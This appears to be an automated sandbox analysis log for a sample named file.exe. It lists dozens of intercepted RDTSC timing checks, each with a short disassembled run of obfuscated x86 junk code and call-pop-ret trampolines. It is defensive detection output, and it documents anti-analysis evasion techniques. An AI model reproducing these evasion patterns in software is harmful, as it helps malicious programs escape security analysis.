                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A85 second address: B23ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F4A81237CC8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 sub dword ptr [ebp+122DB7D1h], ebx 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D19C6h] 0x0000002f call 00007F4A81237CD6h 0x00000034 mov esi, 6682D94Ah 0x00000039 pop esi 0x0000003a push 00000000h 0x0000003c mov di, D194h 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2460E second address: B24612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24612 second address: B2461C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2461C second address: B24620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24620 second address: B2467F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F4A81237CC8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 movsx ecx, cx 0x0000002c mov dword ptr [ebp+1244C317h], esi 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F4A81237CC8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push ebx 0x00000054 pop ebx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B276CE second address: B276D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B276D8 second address: B276F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B276F8 second address: B276FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27D0A second address: B27D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29CA8 second address: B29CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F4A80B11C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27ECD second address: B27ED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F4A81237CC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29CB8 second address: B29CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD99D2 second address: AD99D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B3FF second address: B2B405 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B405 second address: B2B40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B40B second address: B2B411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7EA4 second address: AD7EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2BB1C second address: B2BB39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CAD7 second address: B2CB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4A81237CC8h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F4A81237CC8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d movsx edi, cx 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 movzx ebx, dx 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F4A81237CCDh 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CB25 second address: B2CB2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CB2B second address: B2CB6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4A81237CD8h 0x00000008 jmp 00007F4A81237CD5h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4A81237CCBh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CE0B second address: B2CE15 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF2C second address: B2DF32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FD8F second address: B2FD99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4A80B11C36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FD99 second address: B2FD9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EE6D second address: B2EE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EE73 second address: B2EF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F4A81237CC8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 pushad 0x00000022 jnl 00007F4A81237CCCh 0x00000028 mov dword ptr [ebp+122DB7E2h], esi 0x0000002e popad 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov di, 8C89h 0x0000003a mov ebx, esi 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov ebx, dword ptr [ebp+122D2AA1h] 0x00000049 mov eax, dword ptr [ebp+122D0CD9h] 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007F4A81237CC8h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 00000015h 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 movsx ebx, si 0x0000006c push FFFFFFFFh 0x0000006e mov dword ptr [ebp+1244C8A8h], edx 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 push ebx 0x00000079 pop ebx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EF01 second address: B2EF0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4A80B11C3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30CB6 second address: B30CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30CBB second address: B30D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4A80B11C40h 0x00000008 jmp 00007F4A80B11C3Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F4A80B11C38h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D17DDh], edx 0x00000031 or ebx, dword ptr [ebp+122D3889h] 0x00000037 push 00000000h 0x00000039 call 00007F4A80B11C43h 0x0000003e add edi, dword ptr [ebp+122D2619h] 0x00000044 pop ebx 0x00000045 push 00000000h 0x00000047 mov di, CBE1h 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FFF4 second address: B2FFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D32 second address: B30D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A80B11C3Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FFF8 second address: B2FFFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D4A second address: B30D4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31D63 second address: B31D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30E63 second address: B30E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32DD0 second address: B32DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32DD4 second address: B32DDE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32DDE second address: B32DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A81237CD0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32DF2 second address: B32DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31FCA second address: B31FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34F78 second address: B34F8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35FB9 second address: B35FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35FBF second address: B35FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3860B second address: B3869D instructions: 0x00000000 rdtsc 0x00000002 je 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F4A81237CC8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov bl, 1Fh 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F4A81237CC8h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 or dword ptr [ebp+12471810h], edx 0x0000004c push 00000000h 0x0000004e jl 00007F4A81237CDEh 0x00000054 jmp 00007F4A81237CD8h 0x00000059 xchg eax, esi 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F4A81237CD9h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B350EC second address: B35101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C3Bh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3869D second address: B386A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34147 second address: B341D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4A80B11C38h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 adc bx, 3D3Ah 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov edi, dword ptr [ebp+122D2DB8h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov ebx, esi 0x00000041 mov eax, dword ptr [ebp+122D1251h] 0x00000047 jmp 00007F4A80B11C3Eh 0x0000004c push FFFFFFFFh 0x0000004e jmp 00007F4A80B11C44h 0x00000053 nop 0x00000054 push ebx 0x00000055 push edx 0x00000056 js 00007F4A80B11C36h 0x0000005c pop edx 0x0000005d pop ebx 0x0000005e push eax 0x0000005f pushad 0x00000060 jng 00007F4A80B11C3Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33064 second address: B33068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B351CB second address: B351CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B351CF second address: B351DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3620F second address: B36213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36213 second address: B36217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3972A second address: B3973C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4A80B11C38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3973C second address: B39741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3889D second address: B388BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4A80B11C46h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B39741 second address: B397A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov bx, ax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F4A81237CC8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a jg 00007F4A81237CCBh 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F4A81237CC8h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov bx, 9A5Ah 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 jg 00007F4A81237CC6h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A6AC second address: B3A74A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jno 00007F4A80B11C40h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F4A80B11C38h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D2D50h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F4A80B11C38h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 and edi, 22B5D350h 0x00000056 mov edi, dword ptr [ebp+122D2E60h] 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F4A80B11C47h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A74A second address: B3A76F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4A81237CCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4A81237CD1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A76F second address: B3A773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B7E3 second address: B3B7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4A81237CC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B7ED second address: B3B7F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A8AD second address: B3A962 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4A81237CC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4A81237CD2h 0x00000010 nop 0x00000011 add di, 1A13h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F4A81237CC8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 mov edi, dword ptr [ebp+122D2F3Ch] 0x0000003d jmp 00007F4A81237CCEh 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007F4A81237CC8h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 00000016h 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 mov ebx, dword ptr [ebp+122D2E74h] 0x00000069 mov bl, 95h 0x0000006b mov eax, dword ptr [ebp+122D0D7Dh] 0x00000071 mov ebx, dword ptr [ebp+122D1B83h] 0x00000077 push FFFFFFFFh 0x00000079 jmp 00007F4A81237CCDh 0x0000007e push eax 0x0000007f jl 00007F4A81237CD4h 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A962 second address: B3A966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B405F6 second address: B405FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44A6E second address: B44A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44A76 second address: B44AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4A81237CC6h 0x0000000a js 00007F4A81237CC6h 0x00000010 jmp 00007F4A81237CD5h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F4A81237CD0h 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44AB2 second address: B44AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44AB8 second address: B44AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B445D0 second address: B445E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B445E7 second address: B445ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B445ED second address: B445F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49C7A second address: B49C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49C7E second address: B49CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F4A80B11C47h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edx 0x00000017 jo 00007F4A80B11C3Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49DC9 second address: B49DF9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F4A81237CCBh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4A81237CD3h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49DF9 second address: B49DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
